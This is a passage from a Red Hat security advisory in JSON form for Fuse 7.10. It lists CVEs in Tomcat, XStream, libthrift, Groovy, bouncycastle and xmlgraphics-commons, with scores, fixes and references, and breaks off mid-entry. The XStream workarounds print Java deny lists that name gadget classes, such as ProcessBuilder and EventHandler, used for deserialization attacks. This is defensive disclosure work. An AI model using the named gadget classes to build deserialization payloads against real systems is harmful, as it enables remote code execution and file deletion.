"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-11988",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11988"
},
{
"category": "external",
"summary": "https://xmlgraphics.apache.org/security.html",
"url": "https://xmlgraphics.apache.org/security.html"
}
],
"release_date": "2021-02-24T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Fuse 7.10"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "xmlgraphics-commons: SSRF due to improper input validation by the XMPParser"
},
{
"cve": "CVE-2020-13943",
"cwe": {
"id": "CWE-200",
"name": "Exposure of Sensitive Information to an Unauthorized Actor"
},
"discovery_date": "2020-10-13T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1887648"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Apache Tomcat. If an HTTP/2 client exceeded the agreed maximum number of concurrent streams for a connection (in violation of the HTTP/2 protocol), it is possible that a subsequent request made on that connection could contain HTTP headers - including HTTP/2 pseudo headers - from a previous request rather than the intended headers. This could lead to users seeing responses for unexpected resources. The highest threat from this vulnerability is to data confidentiality.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "tomcat: Apache Tomcat HTTP/2 Request mix-up",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat Enterprise Linux 8\u0027s Identity Management is using an affected version of Tomcat bundled within PKI servlet engine, however HTTP/2 protocol is not supported by this component.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-13943"
},
{
"category": "external",
"summary": "RHBZ#1887648",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1887648"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-13943",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-13943"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-13943",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-13943"
},
{
"category": "external",
"summary": "http://mail-archives.apache.org/mod_mbox/tomcat-announce/202010.mbox/%3C2b767c6e-dcb9-5816-bd69-a3bc0771fef3%40apache.org%3E",
"url": "http://mail-archives.apache.org/mod_mbox/tomcat-announce/202010.mbox/%3C2b767c6e-dcb9-5816-bd69-a3bc0771fef3%40apache.org%3E"
},
{
"category": "external",
"summary": "http://tomcat.apache.org/security-10.html#Fixed_in_Apache_Tomcat_10.0.0-M8",
"url": "http://tomcat.apache.org/security-10.html#Fixed_in_Apache_Tomcat_10.0.0-M8"
},
{
"category": "external",
"summary": "http://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.5.58",
"url": "http://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.5.58"
},
{
"category": "external",
"summary": "http://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.38",
"url": "http://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.38"
}
],
"release_date": "2020-10-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "tomcat: Apache Tomcat HTTP/2 Request mix-up"
},
{
"cve": "CVE-2020-13949",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2021-02-11T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1928172"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in libthrift. Applications using Thrift would not show an error upon receiving messages declaring containers of sizes larger than the payload. This results in malicious RPC clients with the ability to send short messages which would result in a large memory allocation, potentially leading to denial of service. The highest threat from this vulnerability is to system availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "libthrift: potential DoS when processing untrusted payloads",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "* A vulnerable version of the libthrift library is delivered in listed OpenShift Container Platform (OCP) and OpenShift Jaeger (Jaeger) components, but the vulnerable code is not invoked, therefore these components are affected but with impact Moderate. \n\n* For Red Hat OpenStack, because the fix would require a substantial amount of development and OpenDaylight is deprecated in all future versions (RHOSP10 was in tech preview), no update will be provided at this time for the RHOSP libthrift package.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-13949"
},
{
"category": "external",
"summary": "RHBZ#1928172",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1928172"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-13949",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-13949"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-13949",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-13949"
}
],
"release_date": "2021-02-11T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "libthrift: potential DoS when processing untrusted payloads"
},
{
"cve": "CVE-2020-15522",
"cwe": {
"id": "CWE-367",
"name": "Time-of-check Time-of-use (TOCTOU) Race Condition"
},
"discovery_date": "2021-05-20T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1962879"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in bouncycastle. A timing issue within the EC math library can expose information about the private key when an attacker is able to observe timing information for the generation of multiple deterministic ECDSA signatures.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "bouncycastle: Timing issue within the EC math library",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-15522"
},
{
"category": "external",
"summary": "RHBZ#1962879",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1962879"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-15522",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-15522"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-15522",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15522"
}
],
"release_date": "2021-05-20T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "bouncycastle: Timing issue within the EC math library"
},
{
"cve": "CVE-2020-17521",
"cwe": {
"id": "CWE-200",
"name": "Exposure of Sensitive Information to an Unauthorized Actor"
},
"discovery_date": "2021-01-20T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1922123"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Apache Groovy. Groovy makes use of a method for creating temporary directories which is not suitable for security-sensitive contexts and allows for sensitive information leakage. The highest threat from this vulnerability is to data confidentiality.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "groovy: OS temporary directory leads to information disclosure",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw is rated as having a security impact of Moderate and is not currently planned to be addressed in future updates of Red Hat Enterprise Linux 7. Red Hat Enterprise Linux 7 is now in Maintenance Support 2 Phase of the support and maintenance life cycle. For additional information, refer to the Red Hat Enterprise Linux Life Cycle: https://access.redhat.com/support/policy/updates/errata/.\n\nIn OpenShift Container Platform (OCP) the vulnerable version of groovy is delivered in jenkins package and openshift4/ose-metering-hive container. The vulnerable groovy extension methods are not used directly in these components, therefore the impact by this vulnerability is Low.\n\nAlthough an affected version of groovy is shipped in CodeReady Studio, the vulnerable functionality is not used by default, so the impact of this vulnerability is set to Low.\n\nRed Hat CodeReady WorkSpaces 2.7.0 does not ship groovy so is not affected by this flaw.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-17521"
},
{
"category": "external",
"summary": "RHBZ#1922123",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1922123"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-17521",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-17521"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-17521",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-17521"
},
{
"category": "external",
"summary": "https://groovy-lang.org/security.html#CVE-2020-17521",
"url": "https://groovy-lang.org/security.html#CVE-2020-17521"
}
],
"release_date": "2020-11-19T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
},
{
"category": "workaround",
"details": "Setting the `java.io.tmpdir` system environment variable to a directory that is exclusively owned by the executing user will fix this vulnerability for all operating systems and all Groovy versions. Users who cannot easily move to the fixed Groovy versions may wish to consider using the JDK\u2019s Files#createTempDirectory method instead of the Groovy extension methods.",
"product_ids": [
"Red Hat Fuse 7.10"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "groovy: OS temporary directory leads to information disclosure"
},
{
"cve": "CVE-2020-17527",
"cwe": {
"id": "CWE-200",
"name": "Exposure of Sensitive Information to an Unauthorized Actor"
},
"discovery_date": "2020-12-03T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1904221"
}
],
"notes": [
{
"category": "description",
"text": "While investigating bug 64830 it was discovered that Apache Tomcat 10.0.0-M1 to 10.0.0-M9, 9.0.0-M1 to 9.0.39 and 8.5.0 to 8.5.59 could re-use an HTTP request header value from the previous stream received on an HTTP/2 connection for the request associated with the subsequent stream. While this would most likely lead to an error and the closure of the HTTP/2 connection, it is possible that information could leak between requests.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "tomcat: HTTP/2 request header mix-up",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat Enterprise Linux 8\u0027s Identity Management and Certificate System are using a vulnerable version of Tomcat that is bundled into the pki-servlet-engine component. However, HTTP/2 is not enabled in such a configuration, and it is not possible to trigger the flaw in a supported setup. A future update may fix the code.\n\nRed Hat Enterprise Linux 7\u0027s tomcat package, Identity Management, and Certificate System are all not affected by this flaw because HTTP/2 is not supported in the shipped version of tomcat in those packages.\n\ntomcat5 and tomcat6 in Red Hat Enterprise Linux 5 and 6 (respectively) are not affected by this flaw because HTTP/2 is not supported in the shipped versions of those packages.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-17527"
},
{
"category": "external",
"summary": "RHBZ#1904221",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1904221"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-17527",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-17527"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-17527",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-17527"
},
{
"category": "external",
"summary": "http://tomcat.apache.org/security-10.html#Fixed_in_Apache_Tomcat_10.0.0-M10",
"url": "http://tomcat.apache.org/security-10.html#Fixed_in_Apache_Tomcat_10.0.0-M10"
},
{
"category": "external",
"summary": "http://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.5.60",
"url": "http://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.5.60"
},
{
"category": "external",
"summary": "http://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.40",
"url": "http://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.40"
}
],
"release_date": "2020-12-03T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "tomcat: HTTP/2 request header mix-up"
},
{
"cve": "CVE-2020-26217",
"cwe": {
"id": "CWE-502",
"name": "Deserialization of Untrusted Data"
},
"discovery_date": "2020-11-18T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1898907"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in xstream. An unsafe deserialization of user-supplied XML, in conjunction with relying on the default deny list, allows a remote attacker to perform a variety of attacks including a remote code execution of arbitrary code in the context of the JVM running the XStream application. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "XStream: remote code execution due to insecure XML deserialization when relying on blocklists",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "OpenShift Container Platform (OCP) delivers jenkins package with bundled XStream library. Due to JEP-200 Jenkins project [1] and advisory SECURITY-383 [2], OCP jenkins package is not affected by this flaw.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://www.jenkins.io/security/advisory/2017-02-01/ (see SECURITY-383 / CVE-2017-2608)",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-26217"
},
{
"category": "external",
"summary": "RHBZ#1898907",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1898907"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-26217",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-26217"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-26217",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26217"
}
],
"release_date": "2020-11-16T19:40:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
},
{
"category": "workaround",
"details": "Depending on the version of XStream used there are various usage patterns that mitigate this flaw, though we would strongly recommend using the allow list approach if at all possible as there are likely more class combinations the deny list approach may not address.\n\nAllow list approach\n```java\nXStream xstream = new XStream();\nXStream.setupDefaultSecurity(xstream);\nxstream.allowTypesByWildcard(new String[] {\"com.misc.classname\"})\n```\n\nDeny list for XStream 1.4.13\n```java\nxstream.denyTypes(new String[]{ \"javax.imageio.ImageIO$ContainsFilter\" });\nxstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class });\n```\n\nDeny list for XStream 1.4.7 -\u003e 1.4.12\n```java\nxstream.denyTypes(new String[]{ \"javax.imageio.ImageIO$ContainsFilter\" });\nxstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class, java.beans.EventHandler.class, java.lang.ProcessBuilder.class, java.lang.Void.class, void.class });\n```\n\nDeny list for versions prior to XStream 1.4.7\n```java\nxstream.registerConverter(new Converter() {\n public boolean canConvert(Class type) {\n return type != null \u0026\u0026 (type == java.beans.EventHandler.class || type == java.lang.ProcessBuilder.class || type == java.lang.Void.class || void.class || type.getName().equals(\"javax.imageio.ImageIO$ContainsFilter\") || Proxy.isProxy(type));\n }\n\n public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {\n throw new ConversionException(\"Unsupported type due to security reasons.\");\n }\n\n public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {\n throw new ConversionException(\"Unsupported type due to security reasons.\");\n }\n}, XStream.PRIORITY_LOW);\n```",
"product_ids": [
"Red Hat Fuse 7.10"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.0,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "XStream: remote code execution due to insecure XML deserialization when relying on blocklists"
},
{
"cve": "CVE-2020-26259",
"cwe": {
"id": "CWE-78",
"name": "Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)"
},
"discovery_date": "2020-12-16T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1908837"
}
],
"notes": [
{
"category": "description",
"text": "XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.15, is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling. The vulnerability may allow a remote attacker to delete arbitrary know files on the host as log as the executing process has sufficient rights only by manipulating the processed input stream. If you rely on XStream\u0027s default blacklist of the Security Framework, you will have to use at least version 1.4.15. The reported vulnerability does not exist running Java 15 or higher. No user is affected, who followed the recommendation to setup XStream\u0027s Security Framework with a whitelist! Anyone relying on XStream\u0027s default blacklist can immediately switch to a whilelist for the allowed types to avoid the vulnerability. Users of XStream 1.4.14 or below who still want to use XStream default blacklist can use a workaround described in more detailed in the referenced advisories.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "XStream: arbitrary file deletion on the local host when unmarshalling",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "OpenShift Container Platform (OCP) delivers jenkins package with bundled XStream library. Due to JEP-200 Jenkins project [1] and advisory SECURITY-383 [2], OCP jenkins package is not affected by this flaw.\n\n[1] https://github.com/jenkinsci/jep/blob/master/jep/200/README.adoc\n[2] https://www.jenkins.io/security/advisory/2017-02-01/ (see SECURITY-383 / CVE-2017-2608)",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.10"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-26259"
},
{
"category": "external",
"summary": "RHBZ#1908837",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1908837"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-26259",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-26259"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-26259",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26259"
}
],
"release_date": "2020-12-13T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T21:31:33+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse 7.10.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/",
"product_ids": [
"Red Hat Fuse 7.10"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5134"
},
{
"category": "workaround",
"details": "As recommended, use XStream\u0027s security framework to implement a whitelist for the allowed types.\n\nUsers of XStream 1.4.14 who insist to use XStream default blacklist - despite that clear recommendation - can simply add two lines to XStream\u0027s setup code:\n\nxstream.denyTypes(new String[]{ \"jdk.nashorn.internal.objects.NativeString\" });\nxstream.denyTypesByRegExp(new String[]{ \".*\\\\.ReadAllStream\\\\$FileStream\" });\n\nUsers of XStream 1.4.13 who want to use XStream default blacklist can simply add three lines to XStream\u0027s setup code:\n\nxstream.denyTypes(new String[]{ \"javax.imageio.ImageIO$ContainsFilter\", \"jdk.nashorn.internal.objects.NativeString\" });\nxstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class });\nxstream.denyTypesByRegExp(new String[]{ \".*\\\\.ReadAllStream\\\\$FileStream\" });\n\nUsers of XStream 1.4.12 to 1.4.7 who want to use XStream with a blacklist will have to setup such a list from scratch and deny at least the following types: javax.imageio.ImageIO$ContainsFilter, java.beans.EventHandler, java.lang.ProcessBuilder, jdk.nashorn.internal.objects.NativeString, java.lang.Void and void and deny several types by name pattern.\n\nxstream.denyTypes(new String[]{ \"javax.imageio.ImageIO$ContainsFilter\", \"jdk.nashorn.internal.objects.NativeString\" });\nxstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class, java.beans.EventHandler.class, java.lang.ProcessBuilder.class, java.lang.Void.class, void.class });\nxstream.denyTypesByRegExp(new String[]{ \".*\\\\$LazyIterator\", \"javax\\\\.crypto\\\\..*\", \".*\\\\.ReadAllStream\\\\$FileStream\" });\n\nUsers of XStream 1.4.6 or below can register an own converter to prevent the unmarshalling of the currently know critical types of the Java runtime. It is in fact an updated version of the workaround for CVE-2013-7285:\n\nxstream.registerConverter(new Converter() {\n public boolean canConvert(Class type) {\n return type != null \u0026\u0026 (type == java.beans.EventHandler.class || type == java.lang.ProcessBuilder.class\n || type.getName().equals(\"javax.imageio.ImageIO$ContainsFilter\") || type.getName().equals(\"jdk.nashorn.internal.objects.NativeString\")\n || type == java.lang.Void.class || void.class || Proxy.isProxy(type)\n || type.getName().startsWith(\"javax.crypto.\") || type.getName().endsWith(\"$LazyIterator\") || type.getName().endsWith(\".ReadAllStream$FileStream\"));\n }\n\n public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {\n throw new ConversionException(\"Unsupported type due to security reasons.\");\n }\n\n public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {\n throw new ConversionException(\"Unsupported type due to security reasons.\");\n }\n}, XStream.PRIORITY_LOW);",
"product_ids": [
"Red Hat Fuse 7.10"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.10"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "XStream: arbitrary file deletion on the local host when unmarshalling"
},
{
"cve": "CVE-2020-27218",
"cwe": {
"id": "CWE-226",
"name": "Sensitive Information in Resource Not Removed Before Reuse"
},
"discovery_date": "2020-11-28T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1902826"
}
],
"notes": [
{
"category": "description",
